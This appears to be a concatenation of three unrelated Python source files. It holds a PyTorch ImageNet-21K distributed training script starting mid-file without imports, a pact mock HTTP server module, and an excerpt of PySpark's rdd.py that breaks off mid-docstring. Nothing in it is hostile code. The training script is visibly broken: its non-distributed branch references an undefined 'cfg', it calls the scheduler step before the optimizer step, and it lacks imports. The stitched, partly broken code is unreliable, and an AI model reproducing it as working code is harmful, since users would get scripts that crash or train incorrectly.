parser = argparse.ArgumentParser(description='PyTorch ImageNet21K Single-label Training')
parser.add_argument('--data_path', type=str)
parser.add_argument('--lr', default=5e-5, type=float)
parser.add_argument('--model_name', default='tresnet_m')
parser.add_argument('--model_path', default='./tresnet_m.pth', type=str)
parser.add_argument('--num_workers', default=8, type=int)
parser.add_argument('--image_size', default=224, type=int)
parser.add_argument('--num_classes', default=1000, type=int)
parser.add_argument('--batch_size', default=64, type=int)
parser.add_argument('--epochs', default=80, type=int)
parser.add_argument('--weight_decay', default=1e-4, type=float)
parser.add_argument("--label_smooth", default=0.2, type=float)
parser.add_argument("--cfg", default="", type=str)
parser.add_argument('--world-size', default=-1, type=int,
help='number of nodes for distributed training')
parser.add_argument('--rank', default=-1, type=int,
help='node rank for distributed training')
parser.add_argument('--dist-url', default='tcp://224.66.41.62:23456', type=str,
help='url used to set up distributed training')
parser.add_argument('--dist-backend', default='nccl', type=str,
help='distributed backend')
parser.add_argument('--seed', default=None, type=int,
help='seed for initializing training. ')
parser.add_argument('--gpu', default=None, type=int,
help='GPU id to use.')
parser.add_argument('--multiprocessing-distributed', action='store_true',
help='Use multi-processing distributed training to launch '
'N processes per node, which has N GPUs. This is the '
'fastest way to use PyTorch for either single node or '
'multi node data parallel training')
best_acc1 = 0
def main():
args = parser.parse_args()
args.distributed = args.world_size > 1 or args.multiprocessing_distributed
ngpus_per_node = torch.cuda.device_count()
if args.multiprocessing_distributed:
# Since we have ngpus_per_node processes per node, the total world_size
# needs to be adjusted accordingly
args.world_size = ngpus_per_node * args.world_size
# Use torch.multiprocessing.spawn to launch distributed processes: the
# main_worker process function
# processes = []
# for rank in range(ngpus_per_node):
# p = mp.Process(target=main_worker, args=(rank, ngpus_per_node, args))
# p.start()
# processes.append(p)
# for p in processes:
# p.join()
mp.spawn(main_worker, nprocs=ngpus_per_node, args=(ngpus_per_node, args))
else:
# Simply call main_worker function
main_worker(cfg.gpu, ngpus_per_node, cfg)
def main_worker(gpu ,ngpu_per_node, args):
torch.cuda.set_device(gpu)
args.local_rank = gpu
args.rank = args.rank * ngpu_per_node + args.local_rank
# arguments
# args = parser.parse_args()
# EXIF warning silent
silence_PIL_warnings()
# Setup model
model = create_model(args).cuda(gpu)
# create optimizer
optimizer = create_optimizer(model, args)
# setup distributed
model = setup_distrib(model, args)
# Data loading
train_loader, val_loader = create_data_loaders(args)
# Actuall Training
train_21k(model, train_loader, val_loader, optimizer, args)
def train_21k(model, train_loader, val_loader, optimizer, args):
global best_acc1
batch_time = AverageMeter('Time', ':6.3f')
data_time = AverageMeter('Data', ':6.3f')
losses = AverageMeter('Loss', ':.4e')
top1 = AverageMeter('Acc@1', ':6.2f')
top5 = AverageMeter('Acc@5', ':6.2f')
# set loss
loss_fn = CrossEntropyLS(args.label_smooth)
# set scheduler
scheduler = lr_scheduler.OneCycleLR(optimizer, max_lr=args.lr, steps_per_epoch=len(train_loader),
epochs=args.epochs, pct_start=0.1, cycle_momentum=False, div_factor=500)
# set scalaer
scaler = GradScaler()
# training loop
for epoch in range(args.epochs):
progress = ProgressMeter(
len(train_loader),
[batch_time, data_time, losses, top1, top5],
prefix="Epoch: [{}]".format(epoch))
if args.distributed:
train_loader.sampler.set_epoch(epoch)
# train epoch
# print_at_master("\nEpoch {}".format(epoch))
epoch_start_time = time.time()
end = time.time()
for i, (input, target) in enumerate(train_loader):
data_time.update(time.time() - end)
with autocast(): # mixed precision
output = model(input)
loss = loss_fn(output, target) # note - loss also in fp16
losses.update(loss.item(), input.size(0))
model.zero_grad()
scheduler.step()
scaler.scale(loss).backward()
scaler.step(optimizer)
scaler.update()
acc1, acc5 = accuracy(output.float(), target, topk=(1, 5))
top1.update(acc1.item(), input.size(0))
top5.update(acc5.item(), input.size(0))
# batch_time = time.time() - batch_start_time
batch_time.update(time.time() - end)
end = time.time()
if i % 20 == 0:
progress.display(i)
epoch_time = time.time() - epoch_start_time
print_at_master(
"\nFinished Epoch, Training Rate: {:.1f} [img/sec]".format(len(train_loader) *
args.batch_size / epoch_time * max(num_distrib(),
1)))
# validation epoch
acc1 = validate_21k(val_loader, model, args, epoch)
if is_master():
is_best = acc1 > best_acc1
best_acc1 = max(acc1, best_acc1)
save_checkpoint({
'epoch': epoch + 1,
'state_dict': model.state_dict(),
'best_acc1': best_acc1,
'optimizer' : optimizer.state_dict(),
}, is_best)
def validate_21k(val_loader, model, args, epoch):
print_at_master("starting validation")
model.eval()
top1 = AverageMeter('Acc@1', ':6.2f')
top5 = AverageMeter('Acc@5', ':6.2f')
progress = ProgressMeter(
len(val_loader),
[top1, top5],
prefix="Epoch: [{}]".format(epoch))
with torch.no_grad():
for i, (input, target) in enumerate(val_loader):
# mixed precision
with autocast():
logits = model(input).float()
# measure accuracy and record loss
acc1, acc5 = accuracy(logits, target, topk=(1, 5))
if args.distributed:
acc1 = reduce_tensor(acc1, args.world_size)
acc5 = reduce_tensor(acc5, args.world_size)
torch.cuda.synchronize()
top1.update(acc1.item(), input.size(0))
top5.update(acc5.item(), input.size(0))
if i % 20 == 0:
progress.display(i)
print_at_master("Validation results:")
print_at_master('Acc_Top1 [%] {:.2f}, Acc_Top5 [%] {:.2f} '.format(top1.avg, top5.avg))
model.train()
return top1.avg
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self, name, fmt=':f'):
self.name = name
self.fmt = fmt
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def __str__(self):
fmtstr = '{name} {val' + self.fmt + '} ({avg' + self.fmt + '})'
return fmtstr.format(**self.__dict__)
class ProgressMeter(object):
def __init__(self, num_batches, meters, prefix=""):
self.batch_fmtstr = self._get_batch_fmtstr(num_batches)
self.meters = meters
self.prefix = prefix
def display(self, batch):
entries = [self.prefix + self.batch_fmtstr.format(batch)]
entries += [str(meter) for meter in self.meters]
print_at_master('\t'.join(entries))
def _get_batch_fmtstr(self, num_batches):
num_digits = len(str(num_batches // 1))
fmt = '{:' + str(num_digits) + 'd}'
return '[' + fmt + '/' + fmt.format(num_batches) + ']'
def save_checkpoint(state, is_best, filename='checkpoint.pth.tar'):
torch.save(state, filename)
if is_best:
import shutil
shutil.copyfile(filename, 'model_best.pth.tar')
if __name__ == '__main__':
main()
|
mock_server.py | import logging
import queue
import traceback
from http.server import BaseHTTPRequestHandler, HTTPServer
from multiprocessing import Process, Queue
from .pact_request_handler import PactRequestHandler
_providers = {}
log = logging.getLogger(__name__)
def getMockServer(pact):
if pact.provider.name not in _providers:
_providers[pact.provider.name] = Server(pact)
return _providers[pact.provider.name]
class Server:
def __init__(self, pact):
self.pact = pact
self.interactions = Queue()
self.results = Queue()
self.process = Process(target=run_server, args=(pact, self.interactions, self.results))
self.process.start()
def setup(self, interactions):
for interaction in interactions:
self.interactions.put_nowait(interaction)
def verify(self):
while not self.results.empty():
result = self.results.get()
if result["status"] == "error":
raise MockServer.Error(result["reason"])
if result["status"] == "failed":
raise AssertionError(result["reason"])
def terminate(self):
self.process.terminate()
def run_server(pact, interactions, results):
httpd = MockServer(pact, interactions, results)
httpd.serve_forever()
class MockServer(HTTPServer):
def __init__(self, pact, interactions, results):
self.pact = pact
self.incoming_interactions = interactions
self.outgoing_results = results
server_address = ("", pact.port)
super().__init__(server_address, MockHTTPRequestHandler)
self.interactions = []
self.log = logging.getLogger(__name__ + "." + pact.provider.name)
self.log.addHandler(logging.FileHandler(f"{pact.log_dir}/{pact.provider.name}.log"))
self.log.setLevel(logging.DEBUG)
self.log.propagate = False
class Error(Exception):
pass
class MockHTTPRequestHandler(BaseHTTPRequestHandler, PactRequestHandler):
def __init__(self, request, client_address, server):
self.response_status_code = None
self.response_headers = {}
self.response_body = None
PactRequestHandler.__init__(self, server.pact)
BaseHTTPRequestHandler.__init__(self, request, client_address, server)
def error_result(self, message, content="", status="error", status_code=500):
self.server.outgoing_results.put({"status": status, "reason": message})
self.response_status_code = status_code
self.response_headers = {"Content-Type": "text/plain; charset=utf-8"}
self.response_body = (content or message).encode("utf8")
def run_request(self, method):
try:
self.body = None
for header in self.headers:
if header.lower() == "content-length":
self.body = self.rfile.read(int(self.headers[header]))
self.validate_request(method)
except AssertionError as e:
self.error_result(str(e))
except Exception as e:
self.error_result(f"Internal Error: {e}", traceback.format_exc())
self.send_response(self.response_status_code)
for header in self.response_headers:
self.send_header(header, self.response_headers[header])
self.end_headers()
if self.response_body:
self.wfile.write(self.response_body)
def get_interaction(self, path):
try:
interaction = self.server.incoming_interactions.get(False)
except queue.Empty:
raise AssertionError(
f"Request at {path} received but no interaction registered"
) from None
return interaction
def handle_success(self, interaction):
self.server.outgoing_results.put({"status": "success"})
def handle_failure(self, reason):
self.error_result(reason, status="failed", status_code=418)
def respond_for_interaction(self, interaction):
self.response_status_code = interaction["response"]["status"]
if "headers" in interaction["response"]:
self.response_headers.update(interaction["response"]["headers"])
if "body" in interaction["response"]:
self.response_body = self.handle_response_encoding(
interaction["response"], self.response_headers
)
def do_DELETE(self):
self.run_request("DELETE")
def do_GET(self):
self.run_request("GET")
def do_HEAD(self):
self.run_request("HEAD")
def do_POST(self):
self.run_request("POST")
def do_PUT(self):
self.run_request("PUT")
def do_PATCH(self):
self.run_request("PATCH")
def log_message(self, format, *args):
self.server.log.info("MockServer %s\n" % format % args)
|
rdd.py | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import copy
import sys
import os
import re
import operator
import shlex
import warnings
import heapq
import bisect
import random
import socket
from subprocess import Popen, PIPE
from tempfile import NamedTemporaryFile
from threading import Thread
from collections import defaultdict
from itertools import chain
from functools import reduce
from math import sqrt, log, isinf, isnan, pow, ceil
if sys.version > '3':
basestring = unicode = str
else:
from itertools import imap as map, ifilter as filter
from pyspark.java_gateway import local_connect_and_auth
from pyspark.serializers import NoOpSerializer, CartesianDeserializer, \
BatchedSerializer, CloudPickleSerializer, PairDeserializer, \
PickleSerializer, pack_long, AutoBatchedSerializer, write_with_length, \
UTF8Deserializer
from pyspark.join import python_join, python_left_outer_join, \
python_right_outer_join, python_full_outer_join, python_cogroup
from pyspark.statcounter import StatCounter
from pyspark.rddsampler import RDDSampler, RDDRangeSampler, RDDStratifiedSampler
from pyspark.storagelevel import StorageLevel
from pyspark.resultiterable import ResultIterable
from pyspark.shuffle import Aggregator, ExternalMerger, \
get_used_memory, ExternalSorter, ExternalGroupBy
from pyspark.traceback_utils import SCCallSiteSync
from pyspark.util import fail_on_stopiteration
__all__ = ["RDD"]
class PythonEvalType(object):
"""
Evaluation type of python rdd.
These values are internal to PySpark.
These values should match values in org.apache.spark.api.python.PythonEvalType.
"""
NON_UDF = 0
SQL_BATCHED_UDF = 100
SQL_SCALAR_PANDAS_UDF = 200
SQL_GROUPED_MAP_PANDAS_UDF = 201
def portable_hash(x):
"""
This function returns consistent hash code for builtin types, especially
for None and tuple with None.
The algorithm is similar to that one used by CPython 2.7
>>> portable_hash(None)
0
>>> portable_hash((None, 1)) & 0xffffffff
219750521
"""
if sys.version_info >= (3, 2, 3) and 'PYTHONHASHSEED' not in os.environ:
raise Exception("Randomness of hash of string should be disabled via PYTHONHASHSEED")
if x is None:
return 0
if isinstance(x, tuple):
h = 0x345678
for i in x:
h ^= portable_hash(i)
h *= 1000003
h &= sys.maxsize
h ^= len(x)
if h == -1:
h = -2
return int(h)
return hash(x)
class BoundedFloat(float):
"""
Bounded value is generated by approximate job, with confidence and low
bound and high bound.
>>> BoundedFloat(100.0, 0.95, 95.0, 105.0)
100.0
"""
def __new__(cls, mean, confidence, low, high):
obj = float.__new__(cls, mean)
obj.confidence = confidence
obj.low = low
obj.high = high
return obj
def _parse_memory(s):
"""
Parse a memory string in the format supported by Java (e.g. 1g, 200m) and
return the value in MB
>>> _parse_memory("256m")
256
>>> _parse_memory("2g")
2048
"""
units = {'g': 1024, 'm': 1, 't': 1 << 20, 'k': 1.0 / 1024}
if s[-1].lower() not in units:
raise ValueError("invalid format: " + s)
return int(float(s[:-1]) * units[s[-1].lower()])
def _load_from_socket(sock_info, serializer):
(sockfile, sock) = local_connect_and_auth(*sock_info)
# The RDD materialization time is unpredicable, if we set a timeout for socket reading
# operation, it will very possibly fail. See SPARK-18281.
sock.settimeout(None)
# The socket will be automatically closed when garbage-collected.
return serializer.load_stream(sockfile)
def ignore_unicode_prefix(f):
"""
Ignore the 'u' prefix of string in doc tests, to make it works
in both python 2 and 3
"""
if sys.version >= '3':
# the representation of unicode string in Python 3 does not have prefix 'u',
# so remove the prefix 'u' for doc tests
literal_re = re.compile(r"(\W|^)[uU](['])", re.UNICODE)
f.__doc__ = literal_re.sub(r'\1\2', f.__doc__)
return f
class Partitioner(object):
def __init__(self, numPartitions, partitionFunc):
self.numPartitions = numPartitions
self.partitionFunc = partitionFunc
def __eq__(self, other):
return (isinstance(other, Partitioner) and self.numPartitions == other.numPartitions
and self.partitionFunc == other.partitionFunc)
def __call__(self, k):
return self.partitionFunc(k) % self.numPartitions
class RDD(object):
"""
A Resilient Distributed Dataset (RDD), the basic abstraction in Spark.
Represents an immutable, partitioned collection of elements that can be
operated on in parallel.
"""
def __init__(self, jrdd, ctx, jrdd_deserializer=AutoBatchedSerializer(PickleSerializer())):
self._jrdd = jrdd
self.is_cached = False
self.is_checkpointed = False
self.ctx = ctx
self._jrdd_deserializer = jrdd_deserializer
self._id = jrdd.id()
self.partitioner = None
def _pickled(self):
return self._reserialize(AutoBatchedSerializer(PickleSerializer()))
def id(self):
"""
A unique ID for this RDD (within its SparkContext).
"""
return self._id
def __repr__(self):
return self._jrdd.toString()
def __getnewargs__(self):
# This method is called when attempting to pickle an RDD, which is always an error:
raise Exception(
"It appears that you are attempting to broadcast an RDD or reference an RDD from an "
"action or transformation. RDD transformations and actions can only be invoked by the "
"driver, not inside of other transformations; for example, "
"rdd1.map(lambda x: rdd2.values.count() * x) is invalid because the values "
"transformation and count action cannot be performed inside of the rdd1.map "
"transformation. For more information, see SPARK-5063."
)
@property
def context(self):
"""
The L{SparkContext} that this RDD was created on.
"""
return self.ctx
def cache(self):
"""
Persist this RDD with the default storage level (C{MEMORY_ONLY}).
"""
self.is_cached = True
self.persist(StorageLevel.MEMORY_ONLY)
return self
def persist(self, storageLevel=StorageLevel.MEMORY_ONLY):
"""
Set this RDD's storage level to persist its values across operations
after the first time it is computed. This can only be used to assign
a new storage level if the RDD does not have a storage level set yet.
If no storage level is specified defaults to (C{MEMORY_ONLY}).
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> rdd.persist().is_cached
True
"""
self.is_cached = True
javaStorageLevel = self.ctx._getJavaStorageLevel(storageLevel)
self._jrdd.persist(javaStorageLevel)
return self
def unpersist(self):
"""
Mark the RDD as non-persistent, and remove all blocks for it from
memory and disk.
"""
self.is_cached = False
self._jrdd.unpersist()
return self
def checkpoint(self):
"""
Mark this RDD for checkpointing. It will be saved to a file inside the
checkpoint directory set with L{SparkContext.setCheckpointDir()} and
all references to its parent RDDs will be removed. This function must
be called before any job has been executed on this RDD. It is strongly
recommended that this RDD is persisted in memory, otherwise saving it
on a file will require recomputation.
"""
self.is_checkpointed = True
self._jrdd.rdd().checkpoint()
def isCheckpointed(self):
"""
Return whether this RDD is checkpointed and materialized, either reliably or locally.
"""
return self._jrdd.rdd().isCheckpointed()
def localCheckpoint(self):
"""
Mark this RDD for local checkpointing using Spark's existing caching layer.
This method is for users who wish to truncate RDD lineages while skipping the expensive
step of replicating the materialized data in a reliable distributed file system. This is
useful for RDDs with long lineages that need to be truncated periodically (e.g. GraphX).
Local checkpointing sacrifices fault-tolerance for performance. In particular, checkpointed
data is written to ephemeral local storage in the executors instead of to a reliable,
fault-tolerant storage. The effect is that if an executor fails during the computation,
the checkpointed data may no longer be accessible, causing an irrecoverable job failure.
This is NOT safe to use with dynamic allocation, which removes executors along
with their cached blocks. If you must use both features, you are advised to set
L{spark.dynamicAllocation.cachedExecutorIdleTimeout} to a high value.
The checkpoint directory set through L{SparkContext.setCheckpointDir()} is not used.
"""
self._jrdd.rdd().localCheckpoint()
def isLocallyCheckpointed(self):
"""
Return whether this RDD is marked for local checkpointing.
Exposed for testing.
"""
return self._jrdd.rdd().isLocallyCheckpointed()
def getCheckpointFile(self):
"""
Gets the name of the file to which this RDD was checkpointed
Not defined if RDD is checkpointed locally.
"""
checkpointFile = self._jrdd.rdd().getCheckpointFile()
if checkpointFile.isDefined():
return checkpointFile.get()
def map(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each element of this RDD.
>>> rdd = sc.parallelize(["b", "a", "c"])
>>> sorted(rdd.map(lambda x: (x, 1)).collect())
[('a', 1), ('b', 1), ('c', 1)]
"""
def func(_, iterator):
return map(fail_on_stopiteration(f), iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def flatMap(self, f, preservesPartitioning=False):
"""
Return a new RDD by first applying a function to all elements of this
RDD, and then flattening the results.
>>> rdd = sc.parallelize([2, 3, 4])
>>> sorted(rdd.flatMap(lambda x: range(1, x)).collect())
[1, 1, 1, 2, 2, 3]
>>> sorted(rdd.flatMap(lambda x: [(x, x), (x, x)]).collect())
[(2, 2), (2, 2), (3, 3), (3, 3), (4, 4), (4, 4)]
"""
def func(s, iterator):
return chain.from_iterable(map(fail_on_stopiteration(f), iterator))
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitions(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> def f(iterator): yield sum(iterator)
>>> rdd.mapPartitions(f).collect()
[3, 7]
"""
def func(s, iterator):
return f(iterator)
return self.mapPartitionsWithIndex(func, preservesPartitioning)
def mapPartitionsWithIndex(self, f, preservesPartitioning=False):
"""
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithIndex(f).sum()
6
"""
return PipelinedRDD(self, f, preservesPartitioning)
def mapPartitionsWithSplit(self, f, preservesPartitioning=False):
"""
Deprecated: use mapPartitionsWithIndex instead.
Return a new RDD by applying a function to each partition of this RDD,
while tracking the index of the original partition.
>>> rdd = sc.parallelize([1, 2, 3, 4], 4)
>>> def f(splitIndex, iterator): yield splitIndex
>>> rdd.mapPartitionsWithSplit(f).sum()
6
"""
warnings.warn("mapPartitionsWithSplit is deprecated; "
"use mapPartitionsWithIndex instead", DeprecationWarning, stacklevel=2)
return self.mapPartitionsWithIndex(f, preservesPartitioning)
def getNumPartitions(self):
"""
Returns the number of partitions in RDD
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> rdd.getNumPartitions()
2
"""
return self._jrdd.partitions().size()
def filter(self, f):
"""
Return a new RDD containing only the elements that satisfy a predicate.
>>> rdd = sc.parallelize([1, 2, 3, 4, 5])
>>> rdd.filter(lambda x: x % 2 == 0).collect()
[2, 4]
"""
def func(iterator):
return filter(fail_on_stopiteration(f), iterator)
return self.mapPartitions(func, True)
def distinct(self, numPartitions=None):
"""
Return a new RDD containing the distinct elements in this RDD.
>>> sorted(sc.parallelize([1, 1, 2, 3]).distinct().collect())
[1, 2, 3]
"""
return self.map(lambda x: (x, None)) \
.reduceByKey(lambda x, _: x, numPartitions) \
.map(lambda x: x[0])
def sample(self, withReplacement, fraction, seed=None):
"""
Return a sampled subset of this RDD.
:param withReplacement: can elements be sampled multiple times (replaced when sampled out)
:param fraction: expected size of the sample as a fraction of this RDD's size
without replacement: probability that each element is chosen; fraction must be [0, 1]
with replacement: expected number of times each element is chosen; fraction must be >= 0
:param seed: seed for the random number generator
.. note:: This is not guaranteed to provide exactly the fraction specified of the total
count of the given :class:`DataFrame`.
>>> rdd = sc.parallelize(range(100), 4)
>>> 6 <= rdd.sample(False, 0.1, 81).count() <= 14
True
"""
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(RDDSampler(withReplacement, fraction, seed).func, True)
def randomSplit(self, weights, seed=None):
"""
Randomly splits this RDD with the provided weights.
:param weights: weights for splits, will be normalized if they don't sum to 1
:param seed: random seed
:return: split RDDs in a list
>>> rdd = sc.parallelize(range(500), 1)
>>> rdd1, rdd2 = rdd.randomSplit([2, 3], 17)
>>> len(rdd1.collect() + rdd2.collect())
500
>>> 150 < rdd1.count() < 250
True
>>> 250 < rdd2.count() < 350
True
"""
s = float(sum(weights))
cweights = [0.0]
for w in weights:
cweights.append(cweights[-1] + w / s)
if seed is None:
seed = random.randint(0, 2 ** 32 - 1)
return [self.mapPartitionsWithIndex(RDDRangeSampler(lb, ub, seed).func, True)
for lb, ub in zip(cweights, cweights[1:])]
# this is ported from scala/spark/RDD.scala
def takeSample(self, withReplacement, num, seed=None):
"""
Return a fixed-size sampled subset of this RDD.
.. note:: This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> rdd = sc.parallelize(range(0, 10))
>>> len(rdd.takeSample(True, 20, 1))
20
>>> len(rdd.takeSample(False, 5, 2))
5
>>> len(rdd.takeSample(False, 15, 3))
10
"""
numStDev = 10.0
if num < 0:
raise ValueError("Sample size cannot be negative.")
elif num == 0:
return []
initialCount = self.count()
if initialCount == 0:
return []
rand = random.Random(seed)
if (not withReplacement) and num >= initialCount:
# shuffle current RDD and return
samples = self.collect()
rand.shuffle(samples)
return samples
maxSampleSize = sys.maxsize - int(numStDev * sqrt(sys.maxsize))
if num > maxSampleSize:
raise ValueError(
"Sample size cannot be greater than %d." % maxSampleSize)
fraction = RDD._computeFractionForSampleSize(
num, initialCount, withReplacement)
samples = self.sample(withReplacement, fraction, seed).collect()
# If the first sample didn't turn out large enough, keep trying to take samples;
# this shouldn't happen often because we use a big multiplier for their initial size.
# See: scala/spark/RDD.scala
while len(samples) < num:
# TODO: add log warning for when more than one iteration was run
seed = rand.randint(0, sys.maxsize)
samples = self.sample(withReplacement, fraction, seed).collect()
rand.shuffle(samples)
return samples[0:num]
@staticmethod
def _computeFractionForSampleSize(sampleSizeLowerBound, total, withReplacement):
"""
Returns a sampling rate that guarantees a sample of
size >= sampleSizeLowerBound 99.99% of the time.
How the sampling rate is determined:
Let p = num / total, where num is the sample size and total is the
total number of data points in the RDD. We're trying to compute
q > p such that
- when sampling with replacement, we're drawing each data point
with prob_i ~ Pois(q), where we want to guarantee
Pr[s < num] < 0.0001 for s = sum(prob_i for i from 0 to
total), i.e. the failure rate of not having a sufficiently large
sample < 0.0001. Setting q = p + 5 * sqrt(p/total) is sufficient
to guarantee 0.9999 success rate for num > 12, but we need a
slightly larger q (9 empirically determined).
- when sampling without replacement, we're drawing each data point
with prob_i ~ Binomial(total, fraction) and our choice of q
guarantees 1-delta, or 0.9999 success rate, where success rate is
defined the same as in sampling with replacement.
"""
fraction = float(sampleSizeLowerBound) / total
if withReplacement:
numStDev = 5
if (sampleSizeLowerBound < 12):
numStDev = 9
return fraction + numStDev * sqrt(fraction / total)
else:
delta = 0.00005
gamma = - log(delta) / total
return min(1, fraction + gamma + sqrt(gamma * gamma + 2 * gamma * fraction))
def union(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> rdd.union(rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if self._jrdd_deserializer == other._jrdd_deserializer:
rdd = RDD(self._jrdd.union(other._jrdd), self.ctx,
self._jrdd_deserializer)
else:
# These RDDs contain data in different serialized formats, so we
# must normalize them to the default serializer.
self_copy = self._reserialize()
other_copy = other._reserialize()
rdd = RDD(self_copy._jrdd.union(other_copy._jrdd), self.ctx,
self.ctx.serializer)
if (self.partitioner == other.partitioner and
self.getNumPartitions() == rdd.getNumPartitions()):
rdd.partitioner = self.partitioner
return rdd
def intersection(self, other):
"""
Return the intersection of this RDD and another one. The output will
not contain any duplicate elements, even if the input RDDs did.
.. note:: This method performs a shuffle internally.
>>> rdd1 = sc.parallelize([1, 10, 2, 3, 4, 5])
>>> rdd2 = sc.parallelize([1, 6, 2, 3, 7, 8])
>>> rdd1.intersection(rdd2).collect()
[1, 2, 3]
"""
return self.map(lambda v: (v, None)) \
.cogroup(other.map(lambda v: (v, None))) \
.filter(lambda k_vs: all(k_vs[1])) \
.keys()
def _reserialize(self, serializer=None):
serializer = serializer or self.ctx.serializer
if self._jrdd_deserializer != serializer:
self = self.map(lambda x: x, preservesPartitioning=True)
self._jrdd_deserializer = serializer
return self
def __add__(self, other):
"""
Return the union of this RDD and another one.
>>> rdd = sc.parallelize([1, 1, 2, 3])
>>> (rdd + rdd).collect()
[1, 1, 2, 3, 1, 1, 2, 3]
"""
if not isinstance(other, RDD):
raise TypeError
return self.union(other)
def repartitionAndSortWithinPartitions(self, numPartitions=None, partitionFunc=portable_hash,
ascending=True, keyfunc=lambda x: x):
"""
Repartition the RDD according to the given partitioner and, within each resulting partition,
sort records by their keys.
>>> rdd = sc.parallelize([(0, 5), (3, 8), (2, 6), (0, 8), (3, 8), (1, 3)])
>>> rdd2 = rdd.repartitionAndSortWithinPartitions(2, lambda x: x % 2, True)
>>> rdd2.glom().collect()
[[(0, 5), (0, 8), (2, 6)], [(1, 3), (3, 8), (3, 8)]]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
memory = _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted
return iter(sort(iterator, key=lambda k_v: keyfunc(k_v[0]), reverse=(not ascending)))
return self.partitionBy(numPartitions, partitionFunc).mapPartitions(sortPartition, True)
def sortByKey(self, ascending=True, numPartitions=None, keyfunc=lambda x: x):
"""
Sorts this RDD, which is assumed to consist of (key, value) pairs.
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortByKey().first()
('1', 3)
>>> sc.parallelize(tmp).sortByKey(True, 1).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortByKey(True, 2).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> tmp2 = [('Mary', 1), ('had', 2), ('a', 3), ('little', 4), ('lamb', 5)]
>>> tmp2.extend([('whose', 6), ('fleece', 7), ('was', 8), ('white', 9)])
>>> sc.parallelize(tmp2).sortByKey(True, 3, keyfunc=lambda k: k.lower()).collect()
[('a', 3), ('fleece', 7), ('had', 2), ('lamb', 5),...('white', 9), ('whose', 6)]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
memory = self._memory_limit()
serializer = self._jrdd_deserializer
def sortPartition(iterator):
sort = ExternalSorter(memory * 0.9, serializer).sorted
return iter(sort(iterator, key=lambda kv: keyfunc(kv[0]), reverse=(not ascending)))
if numPartitions == 1:
if self.getNumPartitions() > 1:
self = self.coalesce(1)
return self.mapPartitions(sortPartition, True)
# first compute the boundary of each part via sampling: we want to partition
# the key-space into bins such that the bins have roughly the same
# number of (key, value) pairs falling into them
rddSize = self.count()
if not rddSize:
return self # empty RDD
maxSampleSize = numPartitions * 20.0 # constant from Spark's RangePartitioner
fraction = min(maxSampleSize / max(rddSize, 1), 1.0)
samples = self.sample(False, fraction, 1).map(lambda kv: kv[0]).collect()
samples = sorted(samples, key=keyfunc)
# we have numPartitions many parts but one of the them has
# an implicit boundary
bounds = [samples[int(len(samples) * (i + 1) / numPartitions)]
for i in range(0, numPartitions - 1)]
def rangePartitioner(k):
p = bisect.bisect_left(bounds, keyfunc(k))
if ascending:
return p
else:
return numPartitions - 1 - p
return self.partitionBy(numPartitions, rangePartitioner).mapPartitions(sortPartition, True)
def sortBy(self, keyfunc, ascending=True, numPartitions=None):
"""
Sorts this RDD by the given keyfunc
>>> tmp = [('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[0]).collect()
[('1', 3), ('2', 5), ('a', 1), ('b', 2), ('d', 4)]
>>> sc.parallelize(tmp).sortBy(lambda x: x[1]).collect()
[('a', 1), ('b', 2), ('1', 3), ('d', 4), ('2', 5)]
"""
return self.keyBy(keyfunc).sortByKey(ascending, numPartitions).values()
def glom(self):
"""
Return an RDD created by coalescing all elements within each partition
into a list.
>>> rdd = sc.parallelize([1, 2, 3, 4], 2)
>>> sorted(rdd.glom().collect())
[[1, 2], [3, 4]]
"""
def func(iterator):
yield list(iterator)
return self.mapPartitions(func)
def cartesian(self, other):
"""
Return the Cartesian product of this RDD and another one, that is, the
RDD of all pairs of elements C{(a, b)} where C{a} is in C{self} and
C{b} is in C{other}.
>>> rdd = sc.parallelize([1, 2])
>>> sorted(rdd.cartesian(rdd).collect())
[(1, 1), (1, 2), (2, 1), (2, 2)]
"""
# Due to batching, we can't use the Java cartesian method.
deserializer = CartesianDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(self._jrdd.cartesian(other._jrdd), self.ctx, deserializer)
def groupBy(self, f, numPartitions=None, partitionFunc=portable_hash):
"""
Return an RDD of grouped items.
>>> rdd = sc.parallelize([1, 1, 2, 3, 5, 8])
